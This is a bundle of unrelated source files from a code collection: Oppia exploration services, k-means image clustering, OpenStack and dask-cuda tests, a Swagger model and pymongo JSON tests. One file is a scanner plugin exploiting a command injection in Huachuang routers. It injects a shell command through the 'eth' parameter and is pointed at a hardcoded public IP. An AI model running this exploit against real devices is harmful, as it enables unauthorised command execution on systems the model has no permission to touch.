def get_exploration_summary_by_id(exploration_id):
"""Returns a domain object representing an exploration summary.
Args:
exploration_id: str. The id of the ExplorationSummary to be returned.
Returns:
ExplorationSummary. The summary domain object corresponding to the
given exploration.
"""
# TODO(msl): Maybe use memcache similarly to get_exploration_by_id.
exp_summary_model = exp_models.ExpSummaryModel.get(
exploration_id, strict=False)
if exp_summary_model:
exp_summary = get_exploration_summary_from_model(exp_summary_model)
return exp_summary
else:
return None
def get_exploration_summaries_from_models(exp_summary_models):
"""Returns a dict with ExplorationSummary domain objects as values,
keyed by their exploration id.
Args:
exp_summary_models: list(ExplorationSummary). List of ExplorationSummary
model instances.
Returns:
dict. The keys are exploration ids and the values are the corresponding
ExplorationSummary domain objects.
"""
exploration_summaries = [
get_exploration_summary_from_model(exp_summary_model)
for exp_summary_model in exp_summary_models]
result = {}
for exp_summary in exploration_summaries:
result[exp_summary.id] = exp_summary
return result
def get_exploration_summary_from_model(exp_summary_model):
"""Returns an ExplorationSummary domain object.
Args:
exp_summary_model: ExplorationSummary. An ExplorationSummary model
instance.
Returns:
ExplorationSummary. The summary domain object correspoding to the
given exploration summary model.
"""
return exp_domain.ExplorationSummary(
exp_summary_model.id, exp_summary_model.title,
exp_summary_model.category, exp_summary_model.objective,
exp_summary_model.language_code, exp_summary_model.tags,
exp_summary_model.ratings, exp_summary_model.scaled_average_rating,
exp_summary_model.status, exp_summary_model.community_owned,
exp_summary_model.owner_ids, exp_summary_model.editor_ids,
exp_summary_model.voice_artist_ids, exp_summary_model.viewer_ids,
exp_summary_model.contributor_ids,
exp_summary_model.contributors_summary, exp_summary_model.version,
exp_summary_model.exploration_model_created_on,
exp_summary_model.exploration_model_last_updated,
exp_summary_model.first_published_msec,
exp_summary_model.deleted
)
def get_exploration_summaries_matching_ids(exp_ids):
"""Returns a list of ExplorationSummary domain objects (or None if the
corresponding summary does not exist) corresponding to the given
list of exploration ids.
Args:
exp_ids: list(str). List of exploration ids.
Returns:
list(ExplorationSummary|None). List of ExplorationSummary domain objects
corresponding to the given exploration ids. If an ExplorationSummary
does not exist, the corresponding returned list element is None.
"""
return [get_exploration_summary_from_model(model) if model else None
for model in exp_models.ExpSummaryModel.get_multi(exp_ids)]
def get_exploration_summaries_subscribed_to(user_id):
"""Returns a list of ExplorationSummary domain objects that the user
subscribes to.
Args:
user_id: str. The id of the user.
Returns:
list(ExplorationSummary). List of ExplorationSummary domain objects that
the user subscribes to.
"""
return [
summary for summary in
get_exploration_summaries_matching_ids(
subscription_services.get_exploration_ids_subscribed_to(user_id)
) if summary is not None
]
def get_exploration_by_id(exploration_id, strict=True, version=None):
"""Returns an Exploration domain object.
Args:
exploration_id: str. The id of the exploration to be returned.
strict: bool. Whether to fail noisily if no exploration with a given id
exists.
version: int or None. The version of the exploration to be returned.
If None, the latest version of the exploration is returned.
Returns:
Exploration. The domain object corresponding to the given exploration.
"""
sub_namespace = python_utils.UNICODE(version) if version else None
cached_exploration = caching_services.get_multi(
caching_services.CACHE_NAMESPACE_EXPLORATION,
sub_namespace,
[exploration_id]
).get(exploration_id)
if cached_exploration is not None:
return cached_exploration
else:
exploration_model = exp_models.ExplorationModel.get(
exploration_id, strict=strict, version=version)
if exploration_model:
exploration = get_exploration_from_model(exploration_model)
caching_services.set_multi(
caching_services.CACHE_NAMESPACE_EXPLORATION,
sub_namespace,
{
exploration_id: exploration
})
return exploration
else:
return None
def get_multiple_explorations_by_id(exp_ids, strict=True):
"""Returns a dict of domain objects representing explorations with the
given ids as keys. If an exp_id is not present, it is not included in the
return dict.
Args:
exp_ids: list(str). List of ids of the exploration to be returned.
strict: bool. If True, a ValueError is raised when any exploration id
is invalid.
Returns:
dict. Maps exploration ids to the corresponding Exploration domain
objects. Any invalid exploration ids are omitted.
Raises:
ValueError. When strict is True and at least one of the given exp_ids
is invalid.
"""
result = {}
uncached = []
cache_result = caching_services.get_multi(
caching_services.CACHE_NAMESPACE_EXPLORATION, None, exp_ids)
for exp_obj in cache_result.values():
result[exp_obj.id] = exp_obj
for _id in exp_ids:
if _id not in result:
uncached.append(_id)
db_exp_models = exp_models.ExplorationModel.get_multi(uncached)
db_results_dict = {}
not_found = []
for i, eid in enumerate(uncached):
model = db_exp_models[i]
if model:
exploration = get_exploration_from_model(model)
db_results_dict[eid] = exploration
else:
logging.info(
'Tried to fetch exploration with id %s, but no such '
'exploration exists in the datastore' % eid)
not_found.append(eid)
if strict and not_found:
raise ValueError(
'Couldn\'t find explorations with the following ids:\n%s'
% '\n'.join(not_found))
cache_update = {
eid: results for eid, results in db_results_dict.items()
if results is not None
}
if cache_update:
caching_services.set_multi(
caching_services.CACHE_NAMESPACE_EXPLORATION, None, cache_update)
result.update(db_results_dict)
return result
def get_exploration_summaries_where_user_has_role(user_id):
"""Returns a list of ExplorationSummary domain objects where the user has
some role.
Args:
user_id: str. The id of the user.
Returns:
list(ExplorationSummary). List of ExplorationSummary domain objects
where the user has some role.
"""
exp_summary_models = exp_models.ExpSummaryModel.query(
datastore_services.any_of(
exp_models.ExpSummaryModel.owner_ids == user_id,
exp_models.ExpSummaryModel.editor_ids == user_id,
exp_models.ExpSummaryModel.voice_artist_ids == user_id,
exp_models.ExpSummaryModel.viewer_ids == user_id,
exp_models.ExpSummaryModel.contributor_ids == user_id
)
).fetch()
return [
get_exploration_summary_from_model(exp_summary_model)
for exp_summary_model in exp_summary_models
]
|
the-stack_0_25932
|
import cv2
import numpy as np
import matplotlib.pyplot as plt
from glob import glob
# Dicrease color
def dic_color(img):
img //= 63
img = img * 64 + 32
return img
# Database
def get_DB():
# get training image path
train = glob("dataset/train_*")
train.sort()
# prepare database
db = np.zeros((len(train), 13), dtype=np.int32)
pdb = []
# each train
for i, path in enumerate(train):
# read image
img = dic_color(cv2.imread(path))
# histogram
for j in range(4):
db[i, j] = len(np.where(img[..., 0] == (64 * j + 32))[0])
db[i, j+4] = len(np.where(img[..., 1] == (64 * j + 32))[0])
db[i, j+8] = len(np.where(img[..., 2] == (64 * j + 32))[0])
# get class
if 'akahara' in path:
cls = 0
elif 'madara' in path:
cls = 1
# store class label
db[i, -1] = cls
# add image path
pdb.append(path)
return db, pdb
# k-Means
def k_means(db, pdb, Class=2, th=0.5):
# copy database
feats = db.copy()
# initiate random seed
np.random.seed(4)
# assign random class
for i in range(len(feats)):
if np.random.random() < th:
feats[i, -1] = 0
else:
feats[i, -1] = 1
while True:
# prepare greavity
gs = np.zeros((Class, 12), dtype=np.float32)
change_count = 0
# compute gravity
for i in range(Class):
gs[i] = np.mean(feats[np.where(feats[..., -1] == i)[0], :12], axis=0)
# re-labeling
for i in range(len(feats)):
# get distance each nearest graviry
dis = np.sqrt(np.sum(np.square(np.abs(gs - feats[i, :12])), axis=1))
# get new label
pred = np.argmin(dis, axis=0)
# if label is difference from old label
if int(feats[i, -1]) != pred:
change_count += 1
feats[i, -1] = pred
if change_count < 1:
break
for i in range(db.shape[0]):
print(pdb[i], " Pred:", feats[i, -1])
db, pdb = get_DB()
k_means(db, pdb, th=0.3)
|
the-stack_0_25933
|
#!/usr/bin/env python
# coding: UTF-8
'''
author: yichin
name: 华创设备命令执行0day
refer: 0day
description:
华创的设备要被我玩坏了
POC:
http://foobar/acc/network/interface/check_interface_stat.php?eth=a| echo testvul>testvul.txt ||
'''
import urlparse
def assign(service, arg):
if service == 'huachuang_router':
arr = urlparse.urlparse(arg)
return True, '%s://%s/' % (arr.scheme, arr.netloc)
def audit(arg):
payload = arg + 'acc/network/interface/check_interface_stat.php?eth=a|%20echo%20testvul>test.txt%20||'
code, head, res, err, _ = curl.curl2(payload)
if code == 200:
code, head, res, err, _ = curl.curl2(arg + 'acc/network/interface/test.txt')
if code == 200 and 'testvul' in res:
security_hole('命令执行: ' + payload)
if __name__ == '__main__':
from dummy import *
audit(assign('huachuang_router','http://118.26.68.2/')[1])
|
the-stack_0_25935
|
# Copyright 2014 NEC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute import base
from tempest import test
class VersionV3Test(base.BaseV3ComputeTest):
@test.attr(type='gate')
def test_version(self):
# Get version information
resp, version = self.version_client.get_version()
self.assertEqual(200, resp.status)
self.assertIn("id", version)
self.assertEqual("v3.0", version["id"])
|
the-stack_0_25936
|
import numpy as np
import cv2
# Create a black image
img = np.zeros((512, 512, 3), np.uint8)
# Draw a red circle
cv2.circle(img, (447, 63), 63, (0, 0, 255), -1)
cv2.imshow("Circle", img)
key = cv2.waitKey(0)
cv2.destroyAllWindows()
|
the-stack_0_25937
|
# coding: utf-8
"""
APIs Admin do Open Banking Brasil
As API's administrativas são recursos que podem ser consumidos apenas pelo diretório para avaliação e controle da qualidade dos serviços fornecidos pelas instituições financeiras # noqa: E501
OpenAPI spec version: 1.0.0-rc5.2
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class Links(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'_self': 'str',
'first': 'str',
'prev': 'str',
'next': 'str',
'last': 'str'
}
attribute_map = {
'_self': 'self',
'first': 'first',
'prev': 'prev',
'next': 'next',
'last': 'last'
}
def __init__(self, _self=None, first=None, prev=None, next=None, last=None): # noqa: E501
"""Links - a model defined in Swagger""" # noqa: E501
self.__self = None
self._first = None
self._prev = None
self._next = None
self._last = None
self.discriminator = None
if _self is not None:
self._self = _self
if first is not None:
self.first = first
if prev is not None:
self.prev = prev
if next is not None:
self.next = next
if last is not None:
self.last = last
@property
def _self(self):
"""Gets the _self of this Links. # noqa: E501
URL da página atualmente requisitada # noqa: E501
:return: The _self of this Links. # noqa: E501
:rtype: str
"""
return self.__self
@_self.setter
def _self(self, _self):
"""Sets the _self of this Links.
URL da página atualmente requisitada # noqa: E501
:param _self: The _self of this Links. # noqa: E501
:type: str
"""
self.__self = _self
@property
def first(self):
"""Gets the first of this Links. # noqa: E501
URL da primeira página de registros # noqa: E501
:return: The first of this Links. # noqa: E501
:rtype: str
"""
return self._first
@first.setter
def first(self, first):
"""Sets the first of this Links.
URL da primeira página de registros # noqa: E501
:param first: The first of this Links. # noqa: E501
:type: str
"""
self._first = first
@property
def prev(self):
"""Gets the prev of this Links. # noqa: E501
URL da página anterior de registros # noqa: E501
:return: The prev of this Links. # noqa: E501
:rtype: str
"""
return self._prev
@prev.setter
def prev(self, prev):
"""Sets the prev of this Links.
URL da página anterior de registros # noqa: E501
:param prev: The prev of this Links. # noqa: E501
:type: str
"""
self._prev = prev
@property
def next(self):
"""Gets the next of this Links. # noqa: E501
URL da próxima página de registros # noqa: E501
:return: The next of this Links. # noqa: E501
:rtype: str
"""
return self._next
@next.setter
def next(self, next):
"""Sets the next of this Links.
URL da próxima página de registros # noqa: E501
:param next: The next of this Links. # noqa: E501
:type: str
"""
self._next = next
@property
def last(self):
"""Gets the last of this Links. # noqa: E501
URL da última página de registros # noqa: E501
:return: The last of this Links. # noqa: E501
:rtype: str
"""
return self._last
@last.setter
def last(self, last):
"""Sets the last of this Links.
URL da última página de registros # noqa: E501
:param last: The last of this Links. # noqa: E501
:type: str
"""
self._last = last
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Links, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Links):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
the-stack_0_25938
|
import multiprocessing as mp
import numpy as np
import pandas as pd
import pytest
import dask
from dask import dataframe as dd
from dask.dataframe.shuffle import partitioning_index
from distributed import Client
from distributed.deploy.local import LocalCluster
from dask_cuda.explicit_comms import (
CommsContext,
dataframe_merge,
dataframe_shuffle,
)
mp = mp.get_context("spawn")
ucp = pytest.importorskip("ucp")
# Notice, all of the following tests is executed in a new process such
# that UCX options of the different tests doesn't conflict.
async def my_rank(state):
return state["rank"]
def _test_local_cluster(protocol):
with LocalCluster(
protocol=protocol,
dashboard_address=None,
n_workers=4,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster) as client:
comms = CommsContext(client)
assert sum(comms.run(my_rank)) == sum(range(4))
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_local_cluster(protocol):
p = mp.Process(target=_test_local_cluster, args=(protocol,))
p.start()
p.join()
assert not p.exitcode
def _test_dataframe_merge(backend, protocol, n_workers):
if backend == "cudf":
cudf = pytest.importorskip("cudf")
from cudf.tests.utils import assert_eq
else:
from dask.dataframe.utils import assert_eq
dask.config.update(
dask.config.global_config,
{"ucx": {"TLS": "tcp,sockcm,cuda_copy",},},
priority="new",
)
with LocalCluster(
protocol=protocol,
dashboard_address=None,
n_workers=n_workers,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster):
nrows = n_workers * 10
# Let's make some dataframes that we can join on the "key" column
df1 = pd.DataFrame({"key": np.arange(nrows), "payload1": np.arange(nrows)})
key = np.arange(nrows)
np.random.shuffle(key)
df2 = pd.DataFrame(
{"key": key[nrows // 3 :], "payload2": np.arange(nrows)[nrows // 3 :]}
)
expected = df1.merge(df2).set_index("key")
if backend == "cudf":
df1 = cudf.DataFrame.from_pandas(df1)
df2 = cudf.DataFrame.from_pandas(df2)
ddf1 = dd.from_pandas(df1, npartitions=n_workers + 1)
ddf2 = dd.from_pandas(
df2, npartitions=n_workers - 1 if n_workers > 1 else 1
)
ddf3 = dataframe_merge(ddf1, ddf2, on="key").set_index("key")
got = ddf3.compute()
if backend == "cudf":
assert_eq(got, expected)
else:
pd.testing.assert_frame_equal(got, expected)
@pytest.mark.parametrize("nworkers", [1, 2, 4])
@pytest.mark.parametrize("backend", ["pandas", "cudf"])
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_dataframe_merge(backend, protocol, nworkers):
if backend == "cudf":
pytest.importorskip("cudf")
p = mp.Process(target=_test_dataframe_merge, args=(backend, protocol, nworkers))
p.start()
p.join()
assert not p.exitcode
def _test_dataframe_merge_empty_partitions(nrows, npartitions):
with LocalCluster(
protocol="tcp",
dashboard_address=None,
n_workers=npartitions,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster):
df1 = pd.DataFrame({"key": np.arange(nrows), "payload1": np.arange(nrows)})
key = np.arange(nrows)
np.random.shuffle(key)
df2 = pd.DataFrame({"key": key, "payload2": np.arange(nrows)})
expected = df1.merge(df2).set_index("key")
ddf1 = dd.from_pandas(df1, npartitions=npartitions)
ddf2 = dd.from_pandas(df2, npartitions=npartitions)
ddf3 = dataframe_merge(ddf1, ddf2, on=["key"]).set_index("key")
got = ddf3.compute()
pd.testing.assert_frame_equal(got, expected)
def test_dataframe_merge_empty_partitions():
# Notice, we use more partitions than rows
p = mp.Process(target=_test_dataframe_merge_empty_partitions, args=(2, 4))
p.start()
p.join()
assert not p.exitcode
def check_partitions(df, npartitions):
"""Check that all values in `df` hashes to the same"""
hashes = partitioning_index(df, npartitions)
if len(hashes) > 0:
return len(hashes.unique()) == 1
else:
return True
def _test_dataframe_shuffle(backend, protocol, n_workers):
if backend == "cudf":
cudf = pytest.importorskip("cudf")
dask.config.update(
dask.config.global_config,
{"ucx": {"TLS": "tcp,sockcm,cuda_copy",},},
priority="new",
)
with LocalCluster(
protocol=protocol,
dashboard_address=None,
n_workers=n_workers,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster):
nrows_per_worker = 5
np.random.seed(42)
df = pd.DataFrame({"key": np.random.random(n_workers * nrows_per_worker)})
if backend == "cudf":
df = cudf.DataFrame.from_pandas(df)
ddf = dd.from_pandas(df, npartitions=n_workers)
ddf = dataframe_shuffle(ddf, ["key"])
# Check that each partition of `ddf` hashes to the same value
result = ddf.map_partitions(check_partitions, n_workers).compute()
assert all(result.to_list())
@pytest.mark.parametrize("nworkers", [1, 2, 4])
@pytest.mark.parametrize("backend", ["pandas", "cudf"])
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_dataframe_shuffle(backend, protocol, nworkers):
if backend == "cudf":
pytest.importorskip("cudf")
p = mp.Process(target=_test_dataframe_shuffle, args=(backend, protocol, nworkers))
p.start()
p.join()
assert not p.exitcode
|
the-stack_0_25940
|
# Copyright 2009-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test some utilities for working with JSON and PyMongo."""
import datetime
import json
import re
import sys
import uuid
try:
import simplejson
HAS_SIMPLE_JSON = True
except ImportError:
HAS_SIMPLE_JSON = False
sys.path[0:0] = [""]
from pymongo.errors import ConfigurationError
from bson import json_util, EPOCH_AWARE, EPOCH_NAIVE, SON
from bson.json_util import (DatetimeRepresentation,
STRICT_JSON_OPTIONS)
from bson.binary import (Binary, MD5_SUBTYPE, USER_DEFINED_SUBTYPE,
JAVA_LEGACY, CSHARP_LEGACY, STANDARD)
from bson.code import Code
from bson.dbref import DBRef
from bson.int64 import Int64
from bson.max_key import MaxKey
from bson.min_key import MinKey
from bson.objectid import ObjectId
from bson.regex import Regex
from bson.timestamp import Timestamp
from bson.tz_util import FixedOffset, utc
from test import unittest, IntegrationTest
PY3 = sys.version_info[0] == 3
PY26 = sys.version_info[:2] == (2, 6)
class TestJsonUtil(unittest.TestCase):
def round_tripped(self, doc, **kwargs):
return json_util.loads(json_util.dumps(doc, **kwargs), **kwargs)
def round_trip(self, doc, **kwargs):
self.assertEqual(doc, self.round_tripped(doc, **kwargs))
def test_basic(self):
self.round_trip({"hello": "world"})
def test_objectid(self):
self.round_trip({"id": ObjectId()})
def test_dbref(self):
self.round_trip({"ref": DBRef("foo", 5)})
self.round_trip({"ref": DBRef("foo", 5, "db")})
self.round_trip({"ref": DBRef("foo", ObjectId())})
# Check order.
self.assertEqual(
'{"$ref": "collection", "$id": 1, "$db": "db"}',
json_util.dumps(DBRef('collection', 1, 'db')))
def test_datetime(self):
# only millis, not micros
self.round_trip({"date": datetime.datetime(2009, 12, 9, 15,
49, 45, 191000, utc)})
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000+0000"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000000+0000"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000+00:00"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000000+00:00"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000000+00"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000Z"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000000Z"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
# No explicit offset
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000000"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
# Localtime behind UTC
jsn = '{"dt": { "$date" : "1969-12-31T16:00:00.000-0800"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1969-12-31T16:00:00.000000-0800"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1969-12-31T16:00:00.000-08:00"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1969-12-31T16:00:00.000000-08:00"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1969-12-31T16:00:00.000000-08"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
# Localtime ahead of UTC
jsn = '{"dt": { "$date" : "1970-01-01T01:00:00.000+0100"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T01:00:00.000000+0100"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T01:00:00.000+01:00"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T01:00:00.000000+01:00"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T01:00:00.000000+01"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
dtm = datetime.datetime(1, 1, 1, 1, 1, 1, 0, utc)
jsn = '{"dt": {"$date": -62135593139000}}'
self.assertEqual(dtm, json_util.loads(jsn)["dt"])
jsn = '{"dt": {"$date": {"$numberLong": "-62135593139000"}}}'
self.assertEqual(dtm, json_util.loads(jsn)["dt"])
# Test dumps format
pre_epoch = {"dt": datetime.datetime(1, 1, 1, 1, 1, 1, 10000, utc)}
post_epoch = {"dt": datetime.datetime(1972, 1, 1, 1, 1, 1, 10000, utc)}
self.assertEqual(
'{"dt": {"$date": -62135593138990}}',
json_util.dumps(pre_epoch))
self.assertEqual(
'{"dt": {"$date": 63075661010}}',
json_util.dumps(post_epoch))
self.assertEqual(
'{"dt": {"$date": {"$numberLong": "-62135593138990"}}}',
json_util.dumps(pre_epoch, json_options=STRICT_JSON_OPTIONS))
self.assertEqual(
'{"dt": {"$date": "1972-01-01T01:01:01.010Z"}}',
json_util.dumps(post_epoch, json_options=STRICT_JSON_OPTIONS))
number_long_options = json_util.JSONOptions(
datetime_representation=DatetimeRepresentation.NUMBERLONG)
self.assertEqual(
'{"dt": {"$date": {"$numberLong": "63075661010"}}}',
json_util.dumps(post_epoch, json_options=number_long_options))
self.assertEqual(
'{"dt": {"$date": {"$numberLong": "-62135593138990"}}}',
json_util.dumps(pre_epoch, json_options=number_long_options))
# ISO8601 mode assumes naive datetimes are UTC
pre_epoch_naive = {"dt": datetime.datetime(1, 1, 1, 1, 1, 1, 10000)}
post_epoch_naive = {
"dt": datetime.datetime(1972, 1, 1, 1, 1, 1, 10000)}
self.assertEqual(
'{"dt": {"$date": {"$numberLong": "-62135593138990"}}}',
json_util.dumps(pre_epoch_naive, json_options=STRICT_JSON_OPTIONS))
self.assertEqual(
'{"dt": {"$date": "1972-01-01T01:01:01.010Z"}}',
json_util.dumps(post_epoch_naive,
json_options=STRICT_JSON_OPTIONS))
# Test tz_aware and tzinfo options
self.assertEqual(
datetime.datetime(1972, 1, 1, 1, 1, 1, 10000, utc),
json_util.loads(
'{"dt": {"$date": "1972-01-01T01:01:01.010+0000"}}')["dt"])
self.assertEqual(
datetime.datetime(1972, 1, 1, 1, 1, 1, 10000, utc),
json_util.loads(
'{"dt": {"$date": "1972-01-01T01:01:01.010+0000"}}',
json_options=json_util.JSONOptions(tz_aware=True,
tzinfo=utc))["dt"])
self.assertEqual(
datetime.datetime(1972, 1, 1, 1, 1, 1, 10000),
json_util.loads(
'{"dt": {"$date": "1972-01-01T01:01:01.010+0000"}}',
json_options=json_util.JSONOptions(tz_aware=False))["dt"])
self.round_trip(pre_epoch_naive, json_options=json_util.JSONOptions(
tz_aware=False))
# Test a non-utc timezone
pacific = FixedOffset(-8 * 60, 'US/Pacific')
aware_datetime = {"dt": datetime.datetime(2002, 10, 27, 6, 0, 0, 10000,
pacific)}
self.assertEqual(
'{"dt": {"$date": "2002-10-27T06:00:00.010-0800"}}',
json_util.dumps(aware_datetime, json_options=STRICT_JSON_OPTIONS))
self.round_trip(aware_datetime, json_options=json_util.JSONOptions(
tz_aware=True, tzinfo=pacific))
self.round_trip(aware_datetime, json_options=json_util.JSONOptions(
datetime_representation=DatetimeRepresentation.ISO8601,
tz_aware=True, tzinfo=pacific))
def test_regex_object_hook(self):
# Extended JSON format regular expression.
pat = 'a*b'
json_re = '{"$regex": "%s", "$options": "u"}' % pat
loaded = json_util.object_hook(json.loads(json_re))
self.assertTrue(isinstance(loaded, Regex))
self.assertEqual(pat, loaded.pattern)
self.assertEqual(re.U, loaded.flags)
def test_regex(self):
for regex_instance in (
re.compile("a*b", re.IGNORECASE),
Regex("a*b", re.IGNORECASE)):
res = self.round_tripped({"r": regex_instance})["r"]
self.assertEqual("a*b", res.pattern)
res = self.round_tripped({"r": Regex("a*b", re.IGNORECASE)})["r"]
self.assertEqual("a*b", res.pattern)
self.assertEqual(re.IGNORECASE, res.flags)
unicode_options = re.I|re.M|re.S|re.U|re.X
regex = re.compile("a*b", unicode_options)
res = self.round_tripped({"r": regex})["r"]
self.assertEqual(unicode_options, res.flags)
# Some tools may not add $options if no flags are set.
res = json_util.loads('{"r": {"$regex": "a*b"}}')['r']
self.assertEqual(0, res.flags)
self.assertEqual(
Regex('.*', 'ilm'),
json_util.loads(
'{"r": {"$regex": ".*", "$options": "ilm"}}')['r'])
# Check order.
self.assertEqual(
'{"$regex": ".*", "$options": "mx"}',
json_util.dumps(Regex('.*', re.M | re.X)))
self.assertEqual(
'{"$regex": ".*", "$options": "mx"}',
json_util.dumps(re.compile(b'.*', re.M | re.X)))
def test_minkey(self):
self.round_trip({"m": MinKey()})
def test_maxkey(self):
self.round_trip({"m": MaxKey()})
def test_timestamp(self):
dct = {"ts": Timestamp(4, 13)}
res = json_util.dumps(dct, default=json_util.default)
self.assertEqual('{"ts": {"$timestamp": {"t": 4, "i": 13}}}', res)
rtdct = json_util.loads(res)
self.assertEqual(dct, rtdct)
def test_uuid(self):
doc = {'uuid': uuid.UUID('f47ac10b-58cc-4372-a567-0e02b2c3d479')}
self.round_trip(doc)
self.assertEqual(
'{"uuid": {"$uuid": "f47ac10b58cc4372a5670e02b2c3d479"}}',
json_util.dumps(doc))
self.assertEqual(
'{"uuid": {"$binary": "9HrBC1jMQ3KlZw4CssPUeQ==", "$type": "03"}}',
json_util.dumps(doc, json_options=json_util.STRICT_JSON_OPTIONS))
self.assertEqual(
'{"uuid": {"$binary": "9HrBC1jMQ3KlZw4CssPUeQ==", "$type": "04"}}',
json_util.dumps(doc, json_options=json_util.JSONOptions(
strict_uuid=True, uuid_representation=STANDARD)))
self.assertEqual(doc, json_util.loads(
'{"uuid": {"$binary": "9HrBC1jMQ3KlZw4CssPUeQ==", "$type": "03"}}'))
self.assertEqual(doc, json_util.loads(
'{"uuid": {"$binary": "9HrBC1jMQ3KlZw4CssPUeQ==", "$type": "04"}}'))
self.round_trip(doc, json_options=json_util.JSONOptions(
strict_uuid=True, uuid_representation=JAVA_LEGACY))
self.round_trip(doc, json_options=json_util.JSONOptions(
strict_uuid=True, uuid_representation=CSHARP_LEGACY))
def test_binary(self):
bin_type_dict = {"bin": Binary(b"\x00\x01\x02\x03\x04")}
md5_type_dict = {
"md5": Binary(b' n7\x18\xaf\t/\xd1\xd1/\x80\xca\xe7q\xcc\xac',
MD5_SUBTYPE)}
custom_type_dict = {"custom": Binary(b"hello", USER_DEFINED_SUBTYPE)}
self.round_trip(bin_type_dict)
self.round_trip(md5_type_dict)
self.round_trip(custom_type_dict)
# PYTHON-443 ensure old type formats are supported
json_bin_dump = json_util.dumps(bin_type_dict)
self.assertTrue('"$type": "00"' in json_bin_dump)
self.assertEqual(bin_type_dict,
json_util.loads('{"bin": {"$type": 0, "$binary": "AAECAwQ="}}'))
json_bin_dump = json_util.dumps(md5_type_dict)
# Check order.
self.assertEqual(
'{"md5": {"$binary": "IG43GK8JL9HRL4DK53HMrA==",'
+ ' "$type": "05"}}',
json_bin_dump)
self.assertEqual(md5_type_dict,
json_util.loads('{"md5": {"$type": 5, "$binary":'
' "IG43GK8JL9HRL4DK53HMrA=="}}'))
json_bin_dump = json_util.dumps(custom_type_dict)
self.assertTrue('"$type": "80"' in json_bin_dump)
self.assertEqual(custom_type_dict,
json_util.loads('{"custom": {"$type": 128, "$binary":'
' "aGVsbG8="}}'))
# Handle mongoexport where subtype >= 128
self.assertEqual(128,
json_util.loads('{"custom": {"$type": "ffffff80", "$binary":'
' "aGVsbG8="}}')['custom'].subtype)
self.assertEqual(255,
